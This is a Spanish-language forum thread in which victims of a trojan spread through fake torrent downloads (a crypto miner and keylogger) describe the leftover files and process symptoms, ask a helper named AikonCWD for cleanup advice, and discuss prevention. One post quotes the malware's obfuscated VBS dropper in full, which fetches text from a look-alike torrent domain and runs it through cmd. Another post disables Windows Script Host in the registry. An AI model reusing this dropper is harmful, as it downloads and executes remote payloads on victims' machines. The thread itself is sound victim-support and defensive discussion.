#480 perfecto, la borro y la otra carpeta que está en program data? También la borro? Esa tiene otra aplicación, un archivo con terminación au3, otro que se llama pe.bin, y una carpeta con dos archivos raros y 3 documentos de texto con fechas de hoy, ayer y antes de ayer
#482 He intentado borrar ambas carpetas, las borro pero al segundo vuelven a aparecer, sin ni siquiera reiniciar el equipo vuelven
#483 Vale, eso significa que tienes el "bicho" activo en el sistema. Si quieres hablamos por mensaje y esta noche, sobre las 21:30 o así, me conecto en remoto a tu PC y lo limpiamos
#473 Pues menos mal que no he ejecutado el script, porque lo unico que me jode es el keylogger, lo del minero me da igual porque es formatear y listo, pero el keylogger, si tardas en darte cuenta de que lo tienes, unos cuantos datos te habra pillado
Gracias infinitas a @AikonCWD porque sin él estaría perdida y seguiría con el bicho en mi ordenador, fue muy guay ver como lo mataba. Más personas como él es lo que necesita el mundo!
#488 no.
Es muy muy raro encontrar virus multiplataformas. Los hay pero son obras de arte y escasos de ver.
Hola a todos, especialmente a @aikoncwd , ayer estuvo mi padre con la pc (lo cual no puede porque es mia y tiene la suya) y bajo de mejor torrent un capitulo de una serie, y ahora tengo el troyano este, me di cuenta porque sin saber nada ni que habia usado mi pc encuentro un notepad.exe que me consumia 2gb de ram y decia (suspendido) al lado del nombre, lei todo el hilo desde el principio y no encontre nada de lo que mencionaste lo unico que tengo es en programdata/intel/wiriless/6c51418 con el archivo kcaibaf (autobolt), el .au3, el pe.bin y una carpeta con este nombre 2b81b7c que contiene u narchivo de texto con la fecha de hoy y 2 archivos mas (e52dd7e y fb7c82d).
Años sin usar antivirus para que venga mi padre y caiga en algo asi, no lo puedo creer!, odiaria formatear algunos pasos para que siga? gracias!
Edit: Probe borrar los archivos (autobolt) el bin y el au3 y reiniciar la pc y no volvieron a aparecer, pero el notepad.exe con 2gb de ram consuminedome lo vi (una sola vez cuando prendi la pc que habia comentado, luego no lo vi mas), asi que seguramente el troyano esta activo
#491 Bueno hare eso mismo, lo que no entiendo porque uuna vez que cerre el .exe no volvio a aparecer, ya reinicie la pc y la apague y sigue sin aparecer, al igual que los archivos. y tambien me preocupa el keylogger como se si lo tengo?
Y pregunta, algun lugar para descargar las herramientas que necesito? gracias Aikon sos una maravilla de persona!
Edit: Ya hice todos los pasos que me dijiste, alguna forma de saber si todavia esta activo?
Hola @aikoncwd , es normal que en el process explorer aparezca system idle proces y marque eso? cuando en el administrador de tareas normal no? gracias, adjunto la foto!
https://ibb.co/R2Lh2Bb
#494 pero bueno xddd
Luego te contesto, después de cenar sobre las 22h.
Toy liado en casa.
Un saludo
#493 sí. es completamente normal. La CPU siempre está en uso. Cuando no hay ningún proceso real que utilice la CPU, ésta se queda ocupada por system idle. Es un proceso fantasma.
El taskmanager te lo muestra como "Proceso inactivo del sistema"
@aikoncwd por si te quieres entretener, en descargas2020.org han pasado los torrents a sospechosamente estar partidos en .rar (hasta hace nada los torrents eran descargas directas del archivo).
Si le pegas un ojo comentanos plz.
Hola. Me he incorporado a este interesante foro y aprovecho para saludaros a todos.
He seguido el hilo con interés, ya que bajé un vbs y por descuido muuu tonto lo ejecuté.
Afortunadamente he revisado las pautas que habéis indicado en el hilo y no he encontrado indicios de infección.
El código del vbs es el siguiente. Creo que lo han modificado un poco más. Lo que no entiendo es porqué no me he infectado al ejecutarlo, ya que el antivirus creo que no se ha percatado de nada.
CwKN1 = "WinHttp.WinHttpRequest.5.1"'
CwKN2 = "http://www.mejortorrentt.org/img/logo.jpn"'
CwKN3 = "GET"'
CwKN4 = "Shell.Application"'
CwKN5 = "cmd"'
CwKN6 = "User-Agent"'
CwKN7 = "folder b"'
on error resume next'
dim objHTTP'
Set objHTTP = CreateObject(CwKN1)'
objHTTP.Open CwKN3, CwKN2, false'
objHTTP.setRequestHeader CwKN6, CwKN7'
objHTTP.Send'
CreateObject(CwKN4).ShellExecute CwKN5,objHTTP.responseText & Wscript.ScriptName,CwKN8,"",0'''''
He añadido en el registro en [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings] la siguiente clave para que ya no se puede ejecutar código vbs, para evitar futuros problemas: "Enabled"="0"
Lo que no entiendo es que llevando tiempo el virus en circulación y siendo, tanto el minador como el keylogger, bastante conocidos, el antivirus no detecte dichos ficheros y los pare (una vez han sido desencriptados) en el momento de ser ejecutados por el script.
AikonCWD, muchas gracias por todo lo que nos estás ayudándonos a todos.
15 días después
Buenas a todos! He caído también como un principiante al bajar un torrent al estar despistado haciendo otras cosas a la vez. Me imaginaba que sería algo jodido y googleando he llegado aquí.
He ejecutado del tirón el archivo VBS, vamos que en teoría no me he librado. Sin embargo, siguiendo todos los pasos del post #52 no he encontrado absolutamente nada de rastro del gusano. Ni procesos activos, ni rastreando por todas partes el test.au3, ni el keylogger ni nada de nada.
Mi duda es si es que por suerte no me he infectado, que parece lo más probable, o es que es una versión del bicho que ha cambiado las rutas y deja el rastro por otro lado o directamente no lo deja.
Os agradezco infinitamente el trabajo desinteresado para gente que como yo que no tenemos ni papa de informática podamos medio solucionar estos problemas.
Un abrazo!
#489 ¿Podríamos decir entonces que la forma más segura de acceder a estos cutre-portales sería a través de raspbian o cualquier plataforma Linux? Luego creamos una carpeta compartida en la raspberry al pc principal y tirando.
